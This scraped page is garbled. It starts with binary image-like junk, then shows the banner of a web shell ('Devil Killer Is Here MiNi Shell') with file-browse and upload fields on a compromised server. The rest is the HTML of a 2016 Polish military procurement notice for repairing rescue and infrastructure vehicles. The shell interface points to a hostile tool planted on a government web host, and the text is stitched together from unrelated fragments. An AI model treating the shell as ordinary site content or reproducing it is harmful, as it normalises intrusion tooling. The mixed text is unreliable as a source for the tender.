JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160610/80087-N-2016.html

<p class="kh_header"><b>Świętoszów: NAPRAWA BIEŻĄCA POJAZDÓW INFRASTRUKTURY I POJAZDÓW RATOWNICZO-GAŚNICZYCH.</b><br>
<b>Numer ogłoszenia: 80087 - 2016; data zamieszczenia: 10.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 43 Wojskowy Oddział Gospodarczy , ul. Saperska 2, 59-726 Świętoszów, woj. dolnośląskie, tel. 75 735 62 79, faks 75 735 62 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.43wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojskowy Oddział Gospodarczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NAPRAWA BIEŻĄCA POJAZDÓW INFRASTRUKTURY I POJAZDÓW RATOWNICZO-GAŚNICZYCH..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na 4 części (zadania):
Część nr 1 (zadanie nr 1). Naprawy zgodnie z zaleceniami producenta po-jazdów wynikające z czasookresu eksploatacji i przebiegu kilometrów - pojazdy infrastruktury: koparko-ładowarki.

Część nr 2 (zadanie nr 2). Naprawy zgodnie z zaleceniami producenta pojazdów wynikające z czasookresu eksploatacji i przebiegu kilometrów - pojazdy infrastruktury: podwozia podnośników koszowych i samochodów do przewozu kontenerów, pojazdy asenizacyjne. 

Część nr 3 (zadanie nr 3). Naprawy zgodnie z zaleceniami producenta pojazdów wynikające z czasookresu eksploatacji i przebiegu kilometrów:  samochody ratowniczo-gaśnicze.

Część nr 4 (zadanie nr 4). Naprawa części specjalistycznej samochodów ratowniczo-gaśniczych.

W zadaniu nr 4 oferta musi obejmować oddzielną wycenę dla każdego z wymienionych pojazdów ratowniczo gaśniczych i pożarniczych.

Formularz ofertowy (cenowy) do poszczególnych części zamówienia stanowi załącznik nr 4 (a, b, c, d) do SIWZ.

CZĘŚĆ 1-3 (ZADANIA 1-3): Naprawy pojazdów infrastruktury i ratowniczo-gaśniczych.
SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA.
Przedmiotem zamówienia jest sukcesywne wykonywanie, w terminie do dnia 31 października 2016 r., usługi napraw bieżących pojazdów w ilościach i czasie wynikających z bieżących potrzeb oraz według wskazań pokładowych systemów kontroli sprawności  pojazdów będących na ewidencji w 43 Wojskowym Oddziale Gospodarczym w Świętoszowie. Wykonawca dokona napraw w swojej siedzibie gdzie pojazd zostanie dostarczony siłami własnymi wykonawcy, na jego koszt i ryzyko, zestawem do przewozu pojazdów z zachowaniem przepisów ustawy o ruchu drogowym (obciążenia, pozwolenia na przejazd, pilotaż itd.). 

CZĘŚĆ 4 (ZADANIE 4): Naprawy części specjalistycznej samochodów  ratowniczo-gaśniczych.
SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA.
Przedmiotem zamówienia jest sukcesywne wykonywanie, w terminie do dnia 31 października 2016 r., usługi napraw bieżących nadwozi specjalnych samochodów ratowniczo-gaśniczych, a także ich wyposażenia zabudowanego na stałe, będących na ewidencji w 43 Wojskowym Oddziale Gospodarczym w Świętoszowie. 
Wykonawca dokona napraw w swojej siedzibie (warunkiem jest oddalenie siedziby wykonawcy nie dalej niż 100 km od siedziby zamawiającego) gdzie zostanie dostarczony pojazd do naprawy przez zamawiającego. W przypadku większego niż 100 km oddalenia zakładu wykonawcy od siedziby zamawiającego  za transport pojazdu odpowiada wykonawca.

WYMAGANIA (w zakresie zadań 1, 2, 3, 4).
(1) 43 WOG będzie dokonywał zapłaty za faktycznie wykonane naprawy (nie za dyspozycyjność zakładu). Naprawy są naprawami bieżącymi i awaryjnymi, nie planowanymi i wynikającymi z różnych aspektów użytkowania wojskowych pojazdów mechanicznych, nie jest możliwe określenie ich częstotliwości i rodzaju - grupy uszkodzeń (awarii).
(2) Nie dopuszcza się zmian konstrukcyjnych pojazdów oraz ich podzespołów 
i układów.
(3) Części zamienne i materiały użyte w naprawach, przeglądach muszą być nowe i powinny odpowiadać parametrom technicznym zalecanym przez producentów poszczególnych marek pojazdów oraz spełniać normy jakościowe w tym zakresie.
(4) Na wykonaną usługę zostanie udzielona minimum 12-miesięczna gwarancja, a na nowe podzespoły gwarancja równa gwarancji udzielonej przez producenta.
(5) Cena części użytych do naprawy nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
(6) Cena zregenerowanego podzespołu nie może przekraczać 60% wartości nowego.
(7) Awarie pojazdów zgłaszane będą doraźnie niezwłocznie po ich wystąpieniu.
(8) Cena za usługę będzie obejmowała weryfikację niesprawności oraz usunięcie usterki.
(9) Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych części zamiennych i materiałów w tym produktów, materiałów pędnych i smarów.
(10) Wykonawca jest gwarantem wszelkich wykonanych przez siebie usług i napraw.
(11) Termin wykonania usługi naprawy pojazdu nie może być dłuższy niż 14 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego.
(12) Wykonawca zagwarantuje wykonanie napraw jednocześnie do 4 (czterech) pojazdów dla zadań 1-3 oraz do 2 (dwóch) pojazdów dla zadania 4. Termin wykonania usługi może ulec, w uzasadnionych przypadkach, przedłużeniu za zgodą zamawiającego na pisemny wniosek wykonawcy. 
(13) Materiały eksploatacyjne użyte w czasie naprawy muszą być zgodne z zaleceniem producenta pojazdu i dopuszczone prze producenta do stosowania w tego typu pojazdach. 
(14) Materiały użyte w czasie napraw, a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę.
(15) Części zamienne użyte do naprawy pojazdów podlegają zwrotowi zamawiającemu, i są przekazywane użytkownikowi odbierającemu pojazd po naprawie.
Przekazanie możliwe jest dopiero po usunięciu z przekazywanych podzespołów produktów ropopochodnych.
(16) Każdorazowa naprawa poprzedzona będzie wstępnym kosztorysem jej wykonania (dostarczona przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
(17) Wykonawca musi dysponować odpowiednim zapleczem obsługowo-remontowym wyposażonym w komputerowe programy diagnostyczne pojazdów będących przedmiotem zamówienia i potencjałem osobowym, zgodnie z wymaganiami zamawiającego, określonymi w dalszej części niniejszej SIWZ.
(18) Na wezwanie zamawiającego (zadania 1-3) w ramach reklamacji wykonawca zobowiązany jest do odbioru - przy pomocy lawety - samochodu, przeznaczonego do wykonania usługi objętej umową, i przetransportowania pojazdu do miejsca wykonywania usługi, w terminie do 24 godzin od daty powiadomienia, bez dodatkowego wynagrodzenia (jest to element kosztowy, składnik cenotwórczy, który wykonawca uwzględni w cenie ofertowej - patrz: rozdział o obliczeniu ceny ofertowej) i wykonania naprawy w terminie nie dłuższym niż 48 godziny licząc od momentu zgłoszenia faktu zaistnienia awarii.
(19) W przypadku reklamacji (zadanie 4) wykonawca zobowiązany jest do wykonania naprawy w terminie nie dłuższym niż 48 godziny licząc od momentu zgłoszenia faktu zaistnienia awarii.
(20) W przypadku awaryjnego uszkodzenia pojazdu (zadania 1-3) wykonawca na swój koszt odbierze pojazd z miejsca wskazanego przez zamawiającego z przestrzeganiem procedur obowiązujących w (Prawie o ruchu drogowym). 
(21) Wykonawca ponosi odpowiedzialność za sprzęt pozostawiony do naprawy, a zamawiający nie będzie ponosił kosztów wynikłych z przechowywania (parking) pojazdu przed i po naprawie.
(22) Wykonawca po zakończonej naprawie przekaże pojazd przedstawicielowi zamawiającego w siedzibie zamawiającego (zadania 1-3) lub w swojej siedzibie (zadanie 4).
(23) O zakończonej naprawie wykonawca powiadomi niezwłocznie zamawiającego (telefonicznie) nie później jednak niż na 24 godziny przed planowanym terminem przekazania sprzętu i uzgodni termin przekazania sprzętu.
(24) Z odbioru sprzętu sporządza się Protokół Stanu Technicznego (PST) podpisany przez zamawiającego i wykonawcę. W protokole należy wymienić wszystkie czynności (operacje technologiczne) i użyte materiały zamienne i części wymienione.
(25) Odbiór techniczny potwierdza przedstawiciel zamawiającego (właściciel pojazdu) wpisem w PST: POJAZD PO WYKONANEJ NAPRAWIE ODEBRAŁEM SPRAWNY TECHNICZNIE. UWAG NIE WNOSZĘ. Wpisu dokonuje się w pkt 10. PST.
MIEJSCE REALIZACJI
Wykonawca dokona napraw w swojej siedzibie po dostarczeniu pojazdu przez zamawiającego (w przypadku gdy zakład wykonawcy oddalony jest do 100 km od siedziby zamawiającego lub wykonawca wykona transport pojazdu na swój koszt i ryzyko w przypadku oddalenia zakładu wykonawcy od siedziby zamawiającego ponad 100 km- zadanie 4), a w przypadku realizacji zadań 1-3 wykonawca wykona transport do swojej siedziby na własny koszt i ryzyko.
Na żądanie zamawiającego, w przypadku unieruchomienia pojazdu z powodu jego awarii, wykonawca zobowiązany jest do odbioru pojazdu lub naprawy pojazdu we wskazanym miejscu bez dodatkowego wynagrodzenia za dojazd czy przewóz pojazdu, za pomocą lawety (jest to element kosztowy, składnik cenotwórczy, który wykonawca uwzględni w cenie ofertowej - patrz: rozdział o obliczeniu ceny ofertowej).
Usługa ma być realizowana w siedzibie wykonawcy. Odbioru przedmiotu zamówienia po wykonanej usłudze dokona osoba upoważniona (przedstawiciel zamawiającego), w siedzibie zamawiającego (zadania 1-3) lub w siedzibie wykonawcy (zadanie 4), podpisując protokół odbioru spisany przez wykonawcę. Wykonawca ponosi pełną odpowiedzialność za wykonaną usługę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.21.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawców wniesienia wadium do niniejszego postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNKI REALIZACJI ZADAŃ W ZAKRESIE CZĘŚCI NR 1-3 (ZADANIA 1-3): 
Wykonawca winien dysponować minimum sprzętowym:
- co najmniej 3 zadaszonymi stanowiskami naprawczymi, w tym co najmniej 1 stanowiskiem posiadającym kanał obsługowy i 1 z podnośnikiem kolumnowym;
- co najmniej 1 stanowisko lakiernicze z wyposażeniem;
- co najmniej 4 miejscami postojowymi umożliwiającymi zabezpieczenie pojazdów specjalnych oczekujących na naprawę; niezgodność z wcześniejszymi warunkami.
WARUNKI REALIZACJI ZADAŃ W ZAKRESIE CZĘŚCI NR 4 (ZADANIE 4):
Wykonawca winien dysponować minimum sprzętowym:
- co najmniej 1 zadaszonym stanowiskiem naprawczymi posiadającym kanał obsługowy z podnośnikiem kolumnowym;
- co najmniej 1 stanowiskiem lakierniczym z wyposażeniem;
- co najmniej 2 miejscami postojowymi umożliwiającymi zabezpieczenie pojazdów specjalnych oczekujących na naprawę; 
Wykonawca powinien dysponować lawetą lub auto lawetą o odpowiednim DCM.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNKI REALIZACJI ZADAŃ W ZAKRESIE CZĘŚCI NR 1-3 (ZADANIA 1-3): 
Wykonawca winien dysponować osobami posiadającymi kwalifikacje do wykonania usług objętych przedmiotem zamówienia, w tym minimum:
- 1 osobą posiadającą kwalifikacje elektryka;
- 1 osobą posiadające kwalifikacje lakiernika;
- 2 osobami posiadającymi kwalifikacje mechanika samochodowego.
WARUNKI REALIZACJI ZADAŃ W ZAKRESIE CZĘŚCI NR 4 (ZADANIE 4):
Wykonawca winien dysponować osobami posiadającymi kwalifikacje do wykonania usług objętych przedmiotem zamówienia, w tym minimum:
- 1 osobą posiadającą kwalifikacje elektryka; 
- 1 osobą posiadającą kwalifikacje lakiernika;
- 1 osobą posiadającą kwalifikacje do naprawy części specjalistycznej samochodu ratowniczo-gaśniczego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować lawetą lub auto lawetą o odpowiednim DCM oraz posiadać opłacona polisę OC przewoźnika na przewóz pojazdów do 100 000,00 zł, którą musi kontynuować przez cały czas trwania umowy. W przypadku korzystania z usług podwykonawców w zakresie przewozu pojazdów ww. wymagania dotyczą także podwykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.43wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 43 Wojskowy Oddział Gospodarczy, 59-729 Świętoszów, ul. Saperska, bud. nr 43, pok. nr 212 (II piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2016 godzina 11:30, miejsce: 43 Wojskowy Oddział Gospodarczy, 59-729 Świętoszów, ul. Saperska, bud. nr 43, kancelaria jawna - pok. nr 12 (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawy koparko-ładowarek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywne wykonywanie, w terminie do dnia 31 października 2016 r., usługi napraw bieżących pojazdów w ilościach i czasie wynikających z bieżących potrzeb oraz według wskazań pokładowych systemów kontroli sprawności  pojazdów będących na ewidencji w 43 Wojskowym Oddziale Gospodarczym w Świętoszowie. 
Wykonawca dokona napraw w swojej siedzibie gdzie pojazd zostanie dostarczony siłami własnymi wykonawcy, na jego koszt i ryzyko, zestawem do przewozu pojazdów z zachowaniem przepisów ustawy o ruchu drogowym (obciążenia, pozwolenia na przejazd, pilotaż itd.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Narzut ceny w % zakupionych części lub ceny rozliczeniowej części w magazynie Wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawy pojazdów Infrastruktury..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywne wykonywanie, w terminie do dnia 31 października 2016 r., usługi napraw bieżących pojazdów w ilościach i czasie wynikających z bieżących potrzeb oraz według wskazań pokładowych systemów kontroli sprawności  pojazdów będących na ewidencji w 43 Wojskowym Oddziale Gospodarczym w Świętoszowie. 
Wykonawca dokona napraw w swojej siedzibie gdzie pojazd zostanie dostarczony siłami własnymi wykonawcy, na jego koszt i ryzyko, zestawem do przewozu pojazdów z zachowaniem przepisów ustawy o ruchu drogowym (obciążenia, pozwolenia na przejazd, pilotaż itd.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Narzut ceny w % zakupionych części lub ceny rozliczeniowej części w magazynie Wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Naprawy samochodów ratowniczo-gaśniczych..</p>
